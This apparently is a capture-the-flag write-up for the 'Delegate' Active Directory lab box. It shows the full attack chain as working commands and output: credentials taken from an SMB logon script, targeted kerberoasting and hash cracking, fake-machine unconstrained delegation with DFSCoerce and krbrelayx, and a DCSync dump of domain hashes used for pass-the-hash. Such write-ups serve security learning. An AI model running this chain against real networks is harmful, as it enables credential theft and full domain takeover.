Introduction #
Delegate is an Active Directory box starting with bat script in an open SMB share with credentials. Using those use to collect BloodHound data I discover a path to another user who has SeEnableDelegationPrivilege that can be used for unconstrained delegation. After capturing the DC machine account TGT I can DCSync to dump the Administrator NTLM hash and own the domain.
Recon #
nmap #
nmap finds lots of TCP ports:
sudo nmap -sC -sV -vv -oA nmap_scan/nmap_results 10.129.234.69
-sCfor defaults scripts-sVenumerate version-vvdouble verbose-oAoutput in all formats
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-12-10 08:52:13Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: delegate.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: delegate.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
|_ssl-date: 2025-12-10T08:52:54+00:00; -1s from scanner time.
| rdp-ntlm-info:
| Target_Name: DELEGATE
| NetBIOS_Domain_Name: DELEGATE
| NetBIOS_Computer_Name: DC1
| DNS_Domain_Name: delegate.vl
| DNS_Computer_Name: DC1.delegate.vl
| DNS_Tree_Name: delegate.vl
| Product_Version: 10.0.20348
|_ System_Time: 2025-12-10T08:52:14+00:00
| ssl-cert: Subject: commonName=DC1.delegate.vl
| Issuer: commonName=DC1.delegate.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-12-09T08:49:54
| Not valid after: 2026-06-10T08:49:54
| MD5: 5cf5:5ed3:467f:d5b9:6b81:769c:eaf9:7371
| SHA-1: b50a:ab2f:6dd9:db6d:9c70:96cb:b81d:d1e7:86dd:1f49
| -----BEGIN CERTIFICATE-----
| MIIC4jCCAcqgAwIBAgIQXhpVYMhw3IFCfddf5mxdQjANBgkqhkiG9w0BAQsFADAa
| MRgwFgYDVQQDEw9EQzEuZGVsZWdhdGUudmwwHhcNMjUxMjA5MDg0OTU0WhcNMjYw
| NjEwMDg0OTU0WjAaMRgwFgYDVQQDEw9EQzEuZGVsZWdhdGUudmwwggEiMA0GCSqG
| SIb3DQEBAQUAA4IBDwAwggEKAoIBAQCbQutCnqJuicrO9Psjgq6D0ypNrlC4hOut
| VwTPWrCSdDUFOJAqw/hQaTV0Nyld5qfVClpGjGC+txD8nFdiAga2xf7zlYHY6VLS
| +Rjp/4o5MIBILYLyIWBqSfSLmdFq4PPsMtqio3kExNc8VQq45WNLML3RABJbxE+M
| 6XI0/Fe7tkD1HGf+vDqLDiFzYUFGpg0W1vDK9/sD64yXm+2dJ1oNfKs1TMd/h8Ok
| NcWxm9+j/JH6MvXGEOWnINfCPZbguyd7+Ezk1nEDrRVn4K39d4V0qWwc33j11uOA
| xe6ksqDoy/Iq10bgjAvFLlXSMeanhERDFMWlOLg+wFd1ZxhIDwFBAgMBAAGjJDAi
| MBMGA1UdJQQMMAoGCCsGAQUFBwMBMAsGA1UdDwQEAwIEMDANBgkqhkiG9w0BAQsF
| AAOCAQEAOButOQDbQs7WZnf7Ws7sBaEtidGz82bbBzDEkdv4nsNjqGbKLa4bBD6T
| WZAdtRYitTpnrm74fxwOcvtmDXCLxAfPTtsG1fWV/f5He37M6f+sO2Ot04lbfwMT
| c787MT1oerbNq4H55NJsmcSNyDTWqfgAkUgImJvm1++wPpIb2nQD03tSfIvdk11L
| V40Vm8xpWwxeKFY09csgbjHgA6OZgh44VR50QnlK0SP278lsRAKwBmIa/l+zomST
| slUGUnvI/igx/GkSxKHC/3EQTqMpYG2VH8k3H7lZmf/I/MmAUogJAFhPJKKDjtI/
| jMv+tlCV7s1FGjui02QtCpNtHR4LcA==
|_-----END CERTIFICATE-----
Service Info: Host: DC1; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-12-10T08:52:17
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 30710/tcp): CLEAN (Timeout)
| Check 2 (port 53294/tcp): CLEAN (Timeout)
| Check 3 (port 57962/udp): CLEAN (Timeout)
| Check 4 (port 6404/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
Based on ports the box is a Windows Domain Controller. The domain is delegate.vl with DC1 hostname.
I can generate host file:
└─$ netexec smb 10.129.234.69 --generate-hosts-file delegate.hosts
SMB 10.129.234.69 445 DC1 [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:False)
└─$ cat delegate.hosts
10.129.234.69 DC1.delegate.vl delegate.vl DC1
and add it to /etc/hosts
SMB - TCP 445 #
Shares #
Using the guest authentication, I can get the SMB shares:
└─$ netexec smb delegate.vl -u guest -p '' --shares
SMB 10.129.234.69 445 DC1 [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:False)
SMB 10.129.234.69 445 DC1 [+] delegate.vl\guest:
SMB 10.129.234.69 445 DC1 [*] Enumerated shares
SMB 10.129.234.69 445 DC1 Share Permissions Remark
SMB 10.129.234.69 445 DC1 ----- ----------- ------
SMB 10.129.234.69 445 DC1 ADMIN$ Remote Admin
SMB 10.129.234.69 445 DC1 C$ Default share
SMB 10.129.234.69 445 DC1 IPC$ READ Remote IPC
SMB 10.129.234.69 445 DC1 NETLOGON READ Logon server share
SMB 10.129.234.69 445 DC1 SYSVOL READ Logon server share
users.bat #
In the SYSVOL share there is a users.bat script:
└─$ smbclient -N //delegate.vl/SYSVOL
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Sep 9 09:52:30 2023
.. D 0 Sat Aug 26 05:39:25 2023
delegate.vl Dr 0 Sat Aug 26 05:39:25 2023
4652287 blocks of size 4096. 1115992 blocks available
smb: \> cd delegate.vl
smb: \delegate.vl\> ls
. D 0 Sat Aug 26 05:45:45 2023
.. D 0 Sat Aug 26 05:39:25 2023
DfsrPrivate DHSr 0 Sat Aug 26 05:45:45 2023
Policies D 0 Sat Aug 26 05:39:30 2023
scripts D 0 Sat Aug 26 08:45:24 2023
4652287 blocks of size 4096. 1115993 blocks available
smb: \delegate.vl\> cd scripts
smb: \delegate.vl\scripts\> ls
. D 0 Sat Aug 26 08:45:24 2023
.. D 0 Sat Aug 26 05:45:45 2023
users.bat A 159 Sat Aug 26 08:54:29 2023
4652287 blocks of size 4096. 1115993 blocks available
smb: \delegate.vl\scripts\> get users.bat
getting file \delegate.vl\scripts\users.bat of size 159 as users.bat (1.6 KiloBytes/sec) (average 1.6 KiloBytes/sec)
This script has credentials for A.Briggs:
└─$ cat users.bat
rem @echo off
net use * /delete /y
net use v: \\dc1\development
if %USERNAME%==A.Briggs net use h: \\fileserver\backups /user:Administrator P4ssw0rd1#123
Login as A.Briggs #
I verified the password works:
└─$ netexec smb delegate.vl -u A.Briggs -p 'P4ssw0rd1#123'
SMB 10.129.234.69 445 DC1 [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:False)
SMB 10.129.234.69 445 DC1 [+] delegate.vl\A.Briggs:P4ssw0rd1#123
It does on SMB but fails on WinRM and RDP
BloodHound #
With the credentials I can now collect BloodHound data:
└─$ bloodhound-ce-python -c all -d delegate.vl -u A.Briggs -p 'P4ssw0rd1#123' -ns 10.129.234.69 --zip
INFO: BloodHound.py for BloodHound Community Edition
INFO: Found AD domain: delegate.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc1.delegate.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc1.delegate.vl
INFO: Found 9 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC1.delegate.vl
INFO: Done in 00M 05S
INFO: Compressing output into 20251210041219_bloodhound.zip
Looking at the output, A.Briggs has GenericWrite privileges over another user - N.Thompson - who is a member of Remote Management Users, so they should be able to WinRM.
Shell as N. Thompson #
Generic Write access grants you the ability to write to any non-protected attribute on the target object, including “members” for a group, and “servicePrincipalNames” for a user.
The GenericWrite gives me enough privileges to perform a targeted kerberoasting.
I can assign an SPN to N.Thompson then I can request a ticket for that fake service, and get a ticket encrypted with N. Thompson’s password hash which I can try to crack offline.
Or use this script that does that all automatically:
└─$ python3 ~/Tools/targetedKerberoast/targetedKerberoast.py -v -d delegate.vl -u A.Briggs -p 'P4ssw0rd1#123'
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (N.Thompson)
[+] Printing hash for (N.Thompson)
$krb5tgs$23$*N.Thompson$DELEGATE.VL$delegate.vl/N.Thompson*$1c6597db9e8314837f92b8a5c7782cb9$54a85528e200afe0e1d046608c0550a1424eecc9e09c07674551d85235504a7abac5c1c9aa29cd52dacbbfbeee76bf52e815f6f4193625e5a54ffaa302a57260056866700a541ada8acd5206399c5fd7f110a9798b226b403ec82039ae3b25daa39016f3677360197c977c08d1251be6ceb394ba4dc535c92ff1ffae3f5a42b7fbf79828031af260027608b620821fe77f5c20c23441e60965bab88b2e53fd124132208712dffb032ac3bca56d22ac4bc5b77bec8b10423873463315650a87a9fad4e396c20fede20ed1ae50d302138334038058d46edc5d60c3b36f987a06706df6fee4a50cf86413aec967f7eee338b1d7d3c50103fdc73cf2f4204ce585bb3d135403c0e46099867ba13f51060a04e36136033ead366013a566b29ce489db69a063d08610d3519911ad525e1ba5525dd765d7df2c4240468dbccc69fa5e3ee3f3dcb6011d40253bfd0f5a6679fe2e1f2d4759bb1ca06327bc1821828e21a08d0735405355d7451d80ad9bcf305c6b04390be39e7c94c2a9c9425687bdd7db60396cc5c97fadfe1ae8dca07c93b7001b0d22a9ebfb2641f20e102571c4e2ed067a042e164b103aea8c4cfa836bf3249cc4d95927282194164d3f7bf7a0c59cd79bc157c9ba334a9f8b4833473dddc4ebf9ca9de2a9951b76e132721cbf9ac37131baac96fcc82bf3e1da698f89426fa7fa88a48fe7c3353a835782f348cd01c77d6eec122105afdd4582b50907533a3317f2870488446866c8cd3abdc203f563734566e295539ee8c0efd3e1c1ca70d21fcb6c625cd042dee747588272f6ae018a05d27ea5b4c8076bd5c60c51a2788af8e0be38b340e06221a07c5014be66f78e4284abdceb1b35788c4319cd0588501db9e91f395bd0c1819c036bac136784b10daf6a4cce5ebb393e4940706b09d4f96e9fa255663e9f8d64c8c663a69731ea8ddebda66273dc9c4591a475765d1f67729a73052c2ea482855faa6516f1b6a9d58925b06b3d4a76f80a95d9eb842cc01b1571e6f28bf53b9c4816f4e1ff3ab8b4bad5bdbcdcb644b84ad09938a8e01d097306568cc834305e6b9e3a670eb56092b68658d4491d3b192cdb75b101d936dfbd5a75e227ea6441f17e626726bfcd0fdca4625130071583c9d67dfc829bfae462c39a1ccbfa05286de151ea1326ae8fecd504628caed3ac5534b7e1f871c461b3f4074574ee2baef8e2d6d7f70008f49c95dbc9cc0b2d048b354b1ef1702fb205e73506770cda58eec83cae52dff0ac16cd30aeba181089a16cd8369c7b5498fc72c36031c15e3ec2cb53ee9af839a875a7dc482f9f4ab98a83b64fcab1edb4b377c8bdec4c67362ab36df8808711e77d60c1a45ecbc77038dbaa610e08ae67ec3a9af2f56c839d76279d38c2031dfe1284ea5fb325bfa610db1fb2b357eff08a31d393c23669fbba411beeed3be776b1
[VERBOSE] SPN removed successfully for (N.Thompson)
Now I can attempt to crack it:
└─$ hashcat -m 13100 thompson.hash ~/Tools/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-penryn-AMD Ryzen 5 3600 6-Core Processor, 4210/8485 MB (2048 MB allocatable), 6MCU
< SNIP >
Dictionary cache hit:
* Filename..: /home/kali/Tools/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384
$krb5tgs$23$*N.Thompson$DELEGATE.VL$delegate.vl/N.Thompson*$1c6597db9e8314837f92b8a5c7782cb9$54a85528e200afe0e1d046608c0550a1424eecc9e09c07674551d85235504a7abac5c1c9aa29cd52dacbbfbeee76bf52e815f6f4193625e5a54ffaa302a57260056866700a541ada8acd5206399c5fd7f110a9798b226b403ec82039ae3b25daa39016f3677360197c977c08d1251be6ceb394ba4dc535c92ff1ffae3f5a42b7fbf79828031af260027608b620821fe77f5c20c23441e60965bab88b2e53fd124132208712dffb032ac3bca56d22ac4bc5b77bec8b10423873463315650a87a9fad4e396c20fede20ed1ae50d302138334038058d46edc5d60c3b36f987a06706df6fee4a50cf86413aec967f7eee338b1d7d3c50103fdc73cf2f4204ce585bb3d135403c0e46099867ba13f51060a04e36136033ead366013a566b29ce489db69a063d08610d3519911ad525e1ba5525dd765d7df2c4240468dbccc69fa5e3ee3f3dcb6011d40253bfd0f5a6679fe2e1f2d4759bb1ca06327bc1821828e21a08d0735405355d7451d80ad9bcf305c6b04390be39e7c94c2a9c9425687bdd7db60396cc5c97fadfe1ae8dca07c93b7001b0d22a9ebfb2641f20e102571c4e2ed067a042e164b103aea8c4cfa836bf3249cc4d95927282194164d3f7bf7a0c59cd79bc157c9ba334a9f8b4833473dddc4ebf9ca9de2a9951b76e132721cbf9ac37131baac96fcc82bf3e1da698f89426fa7fa88a48fe7c3353a835782f348cd01c77d6eec122105afdd4582b50907533a3317f2870488446866c8cd3abdc203f563734566e295539ee8c0efd3e1c1ca70d21fcb6c625cd042dee747588272f6ae018a05d27ea5b4c8076bd5c60c51a2788af8e0be38b340e06221a07c5014be66f78e4284abdceb1b35788c4319cd0588501db9e91f395bd0c1819c036bac136784b10daf6a4cce5ebb393e4940706b09d4f96e9fa255663e9f8d64c8c663a69731ea8ddebda66273dc9c4591a475765d1f67729a73052c2ea482855faa6516f1b6a9d58925b06b3d4a76f80a95d9eb842cc01b1571e6f28bf53b9c4816f4e1ff3ab8b4bad5bdbcdcb644b84ad09938a8e01d097306568cc834305e6b9e3a670eb56092b68658d4491d3b192cdb75b101d936dfbd5a75e227ea6441f17e626726bfcd0fdca4625130071583c9d67dfc829bfae462c39a1ccbfa05286de151ea1326ae8fecd504628caed3ac5534b7e1f871c461b3f4074574ee2baef8e2d6d7f70008f49c95dbc9cc0b2d048b354b1ef1702fb205e73506770cda58eec83cae52dff0ac16cd30aeba181089a16cd8369c7b5498fc72c36031c15e3ec2cb53ee9af839a875a7dc482f9f4ab98a83b64fcab1edb4b377c8bdec4c67362ab36df8808711e77d60c1a45ecbc77038dbaa610e08ae67ec3a9af2f56c839d76279d38c2031dfe1284ea5fb325bfa610db1fb2b357eff08a31d393c23669fbba411beeed3be776b1:KALEB_2341
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*N.Thompson$DELEGATE.VL$delegate.vl/N.T...e776b1
Time.Started.....: Wed Dec 10 05:01:03 2025 (17 secs)
Time.Estimated...: Wed Dec 10 05:01:20 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/home/kali/Tools/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 650.5 kH/s (1.93ms) @ Accel:1024 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 11003904/14344384 (76.71%)
Rejected.........: 0/11003904 (0.00%)
Restore.Point....: 10997760/14344384 (76.67%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: KBKBKB1 -> KACILOU1*
Hardware.Mon.#1..: Util: 32%
Started: Wed Dec 10 05:01:01 2025
Stopped: Wed Dec 10 05:01:22 2025
The cracked password KALEB_2341 works:
└─$ netexec smb delegate.vl -u N.Thompson -p 'KALEB_2341'
SMB 10.129.234.69 445 DC1 [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:False)
SMB 10.129.234.69 445 DC1 [+] delegate.vl\N.Thompson:KALEB_2341
Shell #
Now I can try to get a shell using WinRM:
└─$ evil-winrm -i delegate.vl -u N.Thompson -p 'KALEB_2341'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> cat ../Desktop/user.txt
75ffb0f6e**********3b424aafe8
*Evil-WinRM* PS C:\Users\N.Thompson\Documents>
Also grab the user flag.
Administrator #
Besides the flag, there’s nothing interesting that N.Thompson can access.
But he has some interesting privileges:
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================================================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
I can use the SeEnableDelegationPrivilege to escalate.
Unconstrained Delegation #
The N.Thompson user can enable delegation privileges on the domain.
Unconstrained Delegation: A machine configured with Unconstrained Delegation will store any TGT of users connecting to it in memory. This allows the machine to then impersonate that user. To configure this, the userAccountControl attribute of the machine gets modified to include the TRUSTED_FOR_DELEGATION flag (which requires the SeEnableDelegationPrivilege domain privilege).
More informaition HERE
To abuse this, I will create new machine account and its DNS record, give it a SPN and set it up for unconstrained delegation.
Then I can coerce the DC to authenticate to the new fake machine and capture a copy of the TGT.
Machine Setup #
First I will use impacket-addcomputer to create the fake machine account:
└─$ impacket-addcomputer -computer-name faker -computer-pass faker123 -dc-ip 10.129.234.69 delegate.vl/N.Thompson:'KALEB_2341'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Successfully added machine account faker$ with password faker123.
Now I can add a DSN record so objects on the domain can communicate with the fake host:
https://github.com/dirkjanm/krbrelayx
└─$ python3 ~/Tools/krbrelayx/dnstool.py -u 'delegate.vl\faker$' -p 'faker123' --action add --record faker.delegate.vl --data 10.10.15.25 --type A -dns-ip 10.129.234.69 delegate.vl
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
And to finish the setup I need to assign it an SPN:
└─$ python3 ~/Tools/krbrelayx/addspn.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'cifs/faker.delegate.vl' -t 'faker$' -dc-ip 10.129.234.69 delegate.vl --additional
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully
Now I can give the host unconstrained delegation using BloodyAD:
└─$ bloodyAD -d delegate.vl -u N.Thompson -p KALEB_2341 --host delegate.vl add uac 'faker$' -f TRUSTED_FOR_DELEGATION
[-] ['TRUSTED_FOR_DELEGATION'] property flags added to faker$'s userAccountControl
Relay #
Now I can set up relay by running krbrelayx.
I need to give it the NTLM hash for the fake computer password - faker123. I can calculate it in Python:
import hashlib
password = 'faker123'
print(hashlib.new('md4', password.encode('utf-16le')).hexdigest())
└─$ python cr_ntlm_hash.py
745e7f210811349ab159a55853dab708
With that I can start the relay:
└─$ python3 ~/Tools/krbrelayx/krbrelayx.py -hashes :745e7f210811349ab159a55853dab708
/home/kali/Tools/krbrelayx/lib/servers/smbrelayserver.py:429: SyntaxWarning: invalid escape sequence '\%'
LOG.error("Authenticating against %s://%s as %s\%s FAILED" % (
/home/kali/Tools/krbrelayx/lib/servers/smbrelayserver.py:441: SyntaxWarning: invalid escape sequence '\%'
LOG.info("Authenticating against %s://%s as %s\%s SUCCEED" % (
/home/kali/Tools/krbrelayx/lib/servers/smbrelayserver.py:516: SyntaxWarning: invalid escape sequence '\%'
LOG.info("Authenticating against %s://%s as %s\%s SUCCEED" % (
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client SMB loaded..
[*] Running in export mode (all tickets will be saved to disk). Works with unconstrained delegation attack only.
[*] Running in unconstrained delegation abuse mode using the specified credentials.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server
[*] Servers started, waiting for connections
I now need to coerce the DC to authenticating to faker.delegate.vl. For that I can use Netexec and its coerce_plus module:
└─$ netexec smb delegate.vl -u 'faker$' -p faker123 -M coerce_plus
SMB 10.129.234.69 445 DC1 [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:False)
SMB 10.129.234.69 445 DC1 [+] delegate.vl\faker$:faker123
COERCE_PLUS 10.129.234.69 445 DC1 VULNERABLE, DFSCoerce
COERCE_PLUS 10.129.234.69 445 DC1 VULNERABLE, PetitPotam
COERCE_PLUS 10.129.234.69 445 DC1 VULNERABLE, PrinterBug
COERCE_PLUS 10.129.234.69 445 DC1 VULNERABLE, PrinterBug
COERCE_PLUS 10.129.234.69 445 DC1 VULNERABLE, MSEven
It is vulnerable to everything, I will choose the DFSCoerce:
└─$ netexec smb delegate.vl -u 'faker$' -p faker123 -M coerce_plus -o LISTENER=faker.delegate.vl METHOD=DFSCoerce
SMB 10.129.234.69 445 DC1 [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:False)
SMB 10.129.234.69 445 DC1 [+] delegate.vl\faker$:faker123
COERCE_PLUS 10.129.234.69 445 DC1 VULNERABLE, DFSCoerce
COERCE_PLUS 10.129.234.69 445 DC1 Exploit Success, netdfs\NetrDfsRemoveRootTarget
COERCE_PLUS 10.129.234.69 445 DC1 Exploit Success, netdfs\NetrDfsAddStdRoot
COERCE_PLUS 10.129.234.69 445 DC1 Exploit Success, netdfs\NetrDfsRemoveStdRoot
At the relay I get this response:
[*] SMBD: Received connection from 10.129.234.69
[*] Got ticket for DC1$@DELEGATE.VL [krbtgt@DELEGATE.VL]
[*] Saving ticket in DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
[*] SMBD: Received connection from 10.129.234.69
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] SMBD: Received connection from 10.129.234.69
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
It saved the TGT
DCSync #
With the TGT for the machine account, I can do a DCSync attack to get all the hashes for the domain:
└─$ netexec smb delegate.vl -u 'faker$' -p faker123 --generate-krb5-file krb5.conf
SMB 10.129.56.255 445 DC1 [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:False) (Null Auth:True) (Guest Auth:True)
SMB 10.129.56.255 445 DC1 [+] delegate.vl\faker$:faker123
With that I can authenticate as the machine account:
└─$ KRB5CCNAME=DC1\$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache netexec smb delegate.vl --use-kcache
SMB dc1.delegate.vl 445 DC1 [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:False) (Null Auth:True) (Guest Auth:True)
SMB dc1.delegate.vl 445 DC1 [+] DELEGATE.VL\DC1$ from ccache
And dump the domain hashes:
└─$ KRB5CCNAME=DC1\$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache netexec smb delegate.vl --use-kcache --ntds
SMB dc1.delegate.vl 445 DC1 [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:False) (Null Auth:True) (Guest Auth:True)
SMB dc1.delegate.vl 445 DC1 [+] DELEGATE.VL\DC1$ from ccache
SMB dc1.delegate.vl 445 DC1 [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
SMB dc1.delegate.vl 445 DC1 [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB dc1.delegate.vl 445 DC1 Administrator:500:aad3b435b51404eeaad3b435b51404ee:c32198ceab4cc695e65045562aa3ee93:::
SMB dc1.delegate.vl 445 DC1 Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: SMB dc1.delegate.vl 445 DC1 krbtgt:502:aad3b435b51404eeaad3b435b51404ee:54999c1daa89d35fbd2e36d01c4a2cf2:::
.
.
.
Administrator #
With the hash I can connect using Evil-WinRM:
└─$ evil-winrm -i delegate.vl -u administrator -H c32198ceab4cc695e65045562aa3ee93
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../Desktop/root.txt
65bbcb00071*********47521b2b
*Evil-WinRM* PS C:\Users\Administrator\Documents>
And grab the root flag!